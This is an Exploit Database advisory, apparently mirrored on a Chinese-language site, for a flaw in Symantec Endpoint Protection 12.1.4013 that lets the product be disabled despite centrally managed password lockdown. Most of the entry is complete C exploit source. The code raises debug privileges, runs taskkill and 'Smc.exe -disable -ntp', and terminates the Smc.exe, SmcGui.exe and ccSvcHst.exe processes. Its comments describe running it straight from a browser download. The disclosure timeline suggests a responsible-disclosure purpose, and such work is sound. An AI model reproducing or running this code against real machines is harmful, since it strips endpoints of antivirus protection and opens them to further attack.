Symantec Endpoint Protection 12.1.4013 – Service Disabling

• Exploit Database
• 111 阅读

• 作者： hyp3rlinx
  日期： 2015-07-08
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/37525/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215

  # Exploit Title: Antivirus # Google Dork: intitle: Antivirus # Date: 2015-07-07 # Exploit Author: John Page ( hyp3rlinx ) # Website: hyp3rlinx.altervista.org # Vendor Homepage: www.symantec.com # Software Link: www.symantec.com/endpoint-protection # Version:12.1.4013 # Tested on: windows 7 SP1 # Category: Antivirus   Vendor: ================================ Symantec ( www.symantec.com )     Product: ================================ Symantec EP 12.1.4013     Advisory Information: ================================================ Disabling Vulnerability     Vulnerability Details: ===================== Symantec EP agent & services can be rendered useless even after globally locking down endpoint protection via a Symantec central management server and enabling globally managed password protection controls. Tested successfully on Windows 7 SP1 result may vary OS to OS.     Exploit code(s): ===============   #include <windows.h> #include <Tlhelp32.h> #define SMC_EXE "Smc.exe" #define SMC_GUI "SmcGui.exe" #define CC_SVC_HST "ccSvcHst.exe"   /* By John Page (hyp3rlinx) - Dec 2014 - hyp3rlinx.altervista.org Symantec Endpoint Protection version 12.1.4013 First reported to Symantec - Jan 20, 2015   Goal: Kill Symantec EP agent & services after globally locking down endpoint protection via the Symantec central management server and enabling globally managed password protection controls. Tested successfully on Windows 7 SP1 result may vary OS to OS.   Scenario: Run the from browser upon download or save to some directory and run Not the most elegant code and I don&apos;t care...   */   void el_crookedio_crosso(const char *victimo){ HANDLE hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0); PROCESSENTRY32 pEntry; pEntry.dwSize=sizeof(pEntry); BOOL hRes=Process32First(hSnapShot,&pEntry);   while(hRes){ if(strcmp(pEntry.szExeFile,victimo)==0){ HANDLE hProcess=OpenProcess(PROCESS_TERMINATE,0,(DWORD)pEntry.th32ProcessID); if (hProcess!=NULL){ TerminateProcess(hProcess,9); CloseHandle(hProcess); } } hRes=Process32Next(hSnapShot,&pEntry); } CloseHandle(hSnapShot); }   DWORD exeo_de_pid(char *ghostofsin){ DWORD ret=0; PROCESSENTRY32 pe32={sizeof (PROCESSENTRY32)}; HANDLE hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if (hProcSnap==INVALID_HANDLE_VALUE) return 0; if (Process32First (hProcSnap,&pe32)) do if (!strcmp(pe32.szExeFile,ghostofsin)) { ret=pe32.th32ProcessID; break; } while (Process32Next (hProcSnap,&pe32)); CloseHandle (hProcSnap); return ret; }   void angelo_maliciouso(){ int AV=exeo_de_pid(SMC_EXE); char id[8]; sprintf(id, "%d ", AV); printf("%s", id); char cmd[50]="Taskkill /F /PID "; strcat(cmd, id); system(cmd);   // system("Taskkill /F /IM Smc.exe"); //Access denied. system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp");   Sleep(1000);   el_crookedio_crosso(SMC_EXE); el_crookedio_crosso(SMC_GUI); el_crookedio_crosso(CC_SVC_HST);   }   int main(void){     puts("/*-----------------------------------------------------------*/\n"); puts("| EXORCIST DE SYMANTEC Antivirus version 12.1.4013 |\n"); puts("| By hyp3rlinx - Jan 2015 |\n");   puts("/*------------------------------------------------------------*/\n");   SetDebugPrivileges(); angelo_maliciouso();   Sleep(1000);   el_crookedio_crosso(SMC_EXE); el_crookedio_crosso(SMC_GUI); el_crookedio_crosso(CC_SVC_HST);   Sleep(2000); angelo_maliciouso();   Sleep(6000);   return 0; }   int SetDebugPrivileges(){ DWORD err=0; TOKEN_PRIVILEGES Debug_Privileges; if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&Debug_Privileges.Privileges[0].Luid))return GetLastError(); HANDLE hToken=0; if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){ err=GetLastError(); if(hToken)CloseHandle(hToken); return err; } Debug_Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; Debug_Privileges.PrivilegeCount=1;   if(!AdjustTokenPrivileges(hToken,FALSE,&Debug_Privileges,0,NULL,NULL)){ err=GetLastError(); if(hToken) CloseHandle(hToken); } return err; }       Disclosure Timeline: =========================================================     Vendor Notification: Jan 20, 2015 July 7, 2015 : Public Disclosure     Severity Level: ========================================================= High     Description: ==================================================================     Request Method(s): [+] Click     Vulnerable Product: [+] Symantec Endpoint Protection version 12.1.4013     Vulnerable Parameter(s): [+] N/A     Affected Area(s): [+] Smc.exe, SmcGui.exe & ccSvcHst.exe     ======================================================================   [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.     (hyp3rlinx)